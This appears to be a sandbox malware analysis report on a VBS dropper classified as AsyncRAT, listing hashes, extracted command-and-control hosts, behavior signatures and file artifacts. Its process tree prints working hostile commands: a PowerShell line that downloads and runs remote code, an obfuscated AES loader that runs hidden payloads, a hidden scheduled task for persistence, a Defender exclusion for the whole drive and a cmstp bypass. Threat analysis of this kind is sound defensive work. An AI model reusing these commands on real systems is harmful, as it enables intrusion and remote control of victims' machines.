Overview

overview

10

Static

static

1

9765_output.vbs

windows7-x64

8

9765_output.vbs

windows10-2004-x64

10

9765_output.vbs

windows10-ltsc 2021-x64

10

9765_output.vbs

windows11-21h2-x64

10

9765_output.vbs

macos-10.15-amd64

4

Analysis

  • max time kernel
    294s
  • max time network
    299s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    09-12-2024 20:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9765_output.vbs

  • Size

    69KB

  • MD5

    f0a90fbc29a64f4274b014755f88c990

  • SHA1

    e8f7053bea6eab342edf9d80c15835b6fb6d9844

  • SHA256

    df37f986e4342d26e408aa370058ba21d218aaac358ba940bde7ac1f035549d7

  • SHA512

    fc42c09434d77f5688d23eab7700440196d07e517e3940d3b47484f2c4de214301063b9537febf1f3396fcf033cead22b4aecd68f18acc7c6f06f8f06ffc3c77

  • SSDEEP

    768:Oyq+h3xb1DhEhMXSHLGjhlZrkoq22Ub9aLILRNho4rBT9qDCJfJw/urPFpjw4g:lhBJihvKjhbQoDNbUILRUcE4wWrtp0D

Score
10/10
asyncratdefaultdiscoveryexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

jt8iyre.localto.net:55644

jt8iyre.localto.net:2101
Mutex

WzRdrlEJS302

Attributes
  • delay

    3

  • install

    false

  • install_file

    dwmm.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 32 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9765_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:688
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4852
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\el3wilvm\el3wilvm.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4552
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7C7.tmp" "c:\Users\Admin\AppData\Local\Temp\el3wilvm\CSCA55195EE3E1C40A78DB5792E9BF265F.TMP"
            5⤵
              PID:1248
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\pzbzmkjn.inf
            4⤵
              PID:2100
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1524
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8l4w457KDIom6rIqFxIss0f2qXmFneRo91Mq9t/nGJg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QryA4ACPDNVab4+J6hK+gg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zmSQy=New-Object System.IO.MemoryStream(,$param_var); $CTpIN=New-Object System.IO.MemoryStream; $uhoSQ=New-Object System.IO.Compression.GZipStream($zmSQy, [IO.Compression.CompressionMode]::Decompress); $uhoSQ.CopyTo($CTpIN); $uhoSQ.Dispose(); $zmSQy.Dispose(); $CTpIN.Dispose(); $CTpIN.ToArray();}function execute_function($param_var,$param2_var){ $UlPQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xvztn=$UlPQj.EntryPoint; $xvztn.Invoke($null, $param2_var);}$xRCke = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $xRCke;$gqghP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($xRCke).Split([Environment]::NewLine);foreach ($TgnJP in $gqghP) { if ($TgnJP.StartsWith(':: ')) { $uPmQq=$TgnJP.Substring(20); break; }}$payloads_var=[string[]]$uPmQq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4976
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_237_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_237.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4496
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_237.vbs"
              4⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1588
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_237.bat" "
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1792
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8l4w457KDIom6rIqFxIss0f2qXmFneRo91Mq9t/nGJg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QryA4ACPDNVab4+J6hK+gg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zmSQy=New-Object System.IO.MemoryStream(,$param_var); $CTpIN=New-Object System.IO.MemoryStream; $uhoSQ=New-Object System.IO.Compression.GZipStream($zmSQy, [IO.Compression.CompressionMode]::Decompress); $uhoSQ.CopyTo($CTpIN); $uhoSQ.Dispose(); $zmSQy.Dispose(); $CTpIN.Dispose(); $CTpIN.ToArray();}function execute_function($param_var,$param2_var){ $UlPQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xvztn=$UlPQj.EntryPoint; $xvztn.Invoke($null, $param2_var);}$xRCke = 'C:\Users\Admin\AppData\Roaming\startup_str_237.bat';$host.UI.RawUI.WindowTitle = $xRCke;$gqghP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($xRCke).Split([Environment]::NewLine);foreach ($TgnJP in $gqghP) { if ($TgnJP.StartsWith(':: ')) { $uPmQq=$TgnJP.Substring(20); break; }}$payloads_var=[string[]]$uPmQq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4708
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3748

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        3eb3833f769dd890afc295b977eab4b4

        SHA1

        e857649b037939602c72ad003e5d3698695f436f

        SHA256

        c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

        SHA512

        c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        f8634c179c1a738e20815ec466527e78

        SHA1

        5ff99194f001b39289485a6c6fa0ba8b5f50aa42

        SHA256

        b97b56e7ceecc7fe39522d3989d98bd233353d0269a7f6517e4a8286b4ed1dc4

        SHA512

        806b40ab4b2cd38140210d1bff3317d51af96008526298aee07e67fa858d5e9646ba594d87a5f22ec5026ee25b93f62d600eb6da92216dfb524b28260fa7388f

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        18KB

        MD5

        f037f06560e3f6192156d43a755a9c70

        SHA1

        3f55459dd097a768d4e3f0516f3bb2c33d63735e

        SHA256

        5bff8ed7b107923d44d1880e415276276d0f9240903aa1d999853b3b9e9faf65

        SHA512

        3edfaf5db654c381810c6791fb7fc525a3ae5bfc42ac92515877e96efdc945444e4f20b6041e4777f0f41bfdc3faf8520e10299cc246abce82fb770136376c77

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        796B

        MD5

        bb3fd3f8c04310348c0d841ed61a954f

        SHA1

        ae1307f27b96577e07b47fff5deb286faa9fe0e7

        SHA256

        570e15a28e03018389b0e31f37f78fcd436c885f9978a2f5674ea195cdf3b731

        SHA512

        4575440cf5add495c7f658fab3a49724b5a799117c387bb53e24eb3c05e08b59952948f2fdfb03f6d7177d8eb77fe0bb19a4fec5fb1baf1f04cd0c9a370f0fa8

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        20b21151d2afe6dd15abd2f2759c4fe5

        SHA1

        76698531892c6ca21eff2b0f38aa7964f3775f6d

        SHA256

        9ef9b7bae93a1d21e767ec94bbe4764672090e28b1cc285b1d9afdbc17d3ddfe

        SHA512

        363a5ee6925e745a459a197748351b5605f8acd5b679d3f04a34d85d49e19861e80eaee59af35a4c91e8fc6498b459d1a3b8f70c1d84db4be3501e552fa6c546

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RESB7C7.tmp
        Filesize

        1KB

        MD5

        15f831b6b8a20f9d7966b6da9f675e31

        SHA1

        f75866f04b971dd054f5e567463f6c75446931de

        SHA256

        cf5d897b6cc33f59a4954a563c9373ba777f09364dfb06fddaef30093d5ef1ab

        SHA512

        6fc2e7c2c0c33ab212b8f7fb27fdf0421a9025f425a630d5d229df94209ac5762445eb84d577e41cd67dc71e78bc7a1a887584c8784caae4e7de1968a6121684

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0xbsjw4g.h4k.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\c.bat
        Filesize

        59KB

        MD5

        2fe4e3e118697eead89b94cebee0ed28

        SHA1

        db39a109814414635ab1a4927a7b6e36b4d1c6c7

        SHA256

        49e4034c34b5666f17def98af21b627c4bc9c1e9e8a7022b4d37135d3807d8bd

        SHA512

        ca116d36ff813b12323a25825282ee113295cf71b77e323999b7c6058490924f417e08f27e22549f4b4a996cd6ef84e34ab16c678a86767e76b2f3eb6dad585f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\el3wilvm\el3wilvm.dll
        Filesize

        4KB

        MD5

        cb8a4f5578e705943b37d1171d9d0d20

        SHA1

        e206fc761cadb82bf21b856f7ecbd64f507540a6

        SHA256

        b0bd8c96f450d1ce80cc91a562f6c0179f63ebecb28bbd3934406438880a144e

        SHA512

        cb57f85f8e79ee30271ada467b5b188ac61448feb19578d97527117bc61140c3955f50c5a37bfed9062906e91d3c489e00b4300c40bb026adea6ea46c61a3d3d

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_237.vbs
        Filesize

        115B

        MD5

        b86becab049b29b680d87848833124bf

        SHA1

        0360b81d38586be27f52e4e1b744b7821088cbd2

        SHA256

        44a3186524c763c49e637e8e53a3a9c441a2788cf6314dab1f17831f6204007b

        SHA512

        5c9c274d7eea774c4bcda5fd66ece0476aebb62981e45609b6e6ebf45a61245bd1f941960b53cf33cbd4881cf0a7141bc0b06848b605a2213ed9a22ac89f378c

        Download Submit

      • C:\windows\temp\pzbzmkjn.inf
        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\el3wilvm\CSCA55195EE3E1C40A78DB5792E9BF265F.TMP
        Filesize

        652B

        MD5

        a21a0219676a1ef484bba306826475af

        SHA1

        4b8c4c73d4912db6ebcec269f80af5ff6b6f522a

        SHA256

        279f974b1125a5f19599ab81ccff57cc3f268fd5c64957cc18163ca2f8b2eabd

        SHA512

        36bdaeadc274025872e4bb9f8726ed39ad1e201f946483de9cbb5056dcd605af4d073464baaaf0e925c44b2478f05ff0678ffb598f82e2d573315364e187fd47

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\el3wilvm\el3wilvm.0.cs
        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\el3wilvm\el3wilvm.cmdline
        Filesize

        369B

        MD5

        c52e5382ba0a5e395fc1e39c4d52248c

        SHA1

        c4a28169e223af9402a5ce58a544e0a42615c62b

        SHA256

        2fb79f8f19f844161706715feb5d6b79a31bd460ae2dcb59fa55cbd634360f63

        SHA512

        a0c8a5acebec9da859055aa86fcbc5f9f4c46995d56dcebc1868f72b1acdbcc8cce6c5e933045b1ab2634a8643efc38a21d6e20ebac179ed294d77e5d6881ddb

        Download Submit

      • memory/2952-126-0x0000000006100000-0x0000000006112000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4496-103-0x0000000007F90000-0x0000000008026000-memory.dmp

        Filesize

        600KB

        Download

      • memory/4496-102-0x0000000007D80000-0x0000000007D8A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4496-101-0x0000000007BC0000-0x0000000007C63000-memory.dmp

        Filesize

        652KB

        Download

      • memory/4496-104-0x0000000007F00000-0x0000000007F11000-memory.dmp

        Filesize

        68KB

        Download

      • memory/4496-100-0x0000000007B40000-0x0000000007B5E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4496-90-0x00000000711A0000-0x00000000711EC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4496-89-0x0000000007B80000-0x0000000007BB2000-memory.dmp

        Filesize

        200KB

        Download

      • memory/4852-27-0x00000249CE1B0000-0x00000249CE1B8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4852-49-0x00007FFF81210000-0x00007FFF81CD2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4852-1-0x00000249B3570000-0x00000249B3592000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4852-11-0x00007FFF81210000-0x00007FFF81CD2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4852-12-0x00007FFF81210000-0x00007FFF81CD2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4852-13-0x00007FFF81210000-0x00007FFF81CD2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4852-14-0x00000249CE1D0000-0x00000249CE1EC000-memory.dmp

        Filesize

        112KB

        Download

      • memory/4852-0-0x00007FFF81213000-0x00007FFF81215000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4852-44-0x00007FFF81213000-0x00007FFF81215000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4852-45-0x00007FFF81210000-0x00007FFF81CD2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4976-74-0x0000000006AB0000-0x0000000006AFC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4976-58-0x0000000005D00000-0x00000000063CA000-memory.dmp

        Filesize

        6.8MB

        Download

      • memory/4976-57-0x00000000034E0000-0x0000000003516000-memory.dmp

        Filesize

        216KB

        Download

      • memory/4976-78-0x0000000008900000-0x0000000008EA6000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4976-77-0x0000000007C60000-0x0000000007C6E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/4976-76-0x0000000007C20000-0x0000000007C3A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4976-75-0x0000000008280000-0x00000000088FA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/4976-61-0x00000000064E0000-0x0000000006546000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4976-73-0x0000000006A30000-0x0000000006A4E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4976-59-0x00000000063D0000-0x00000000063F2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4976-71-0x0000000006660000-0x00000000069B7000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4976-60-0x0000000006470000-0x00000000064D6000-memory.dmp

        Filesize

        408KB

        Download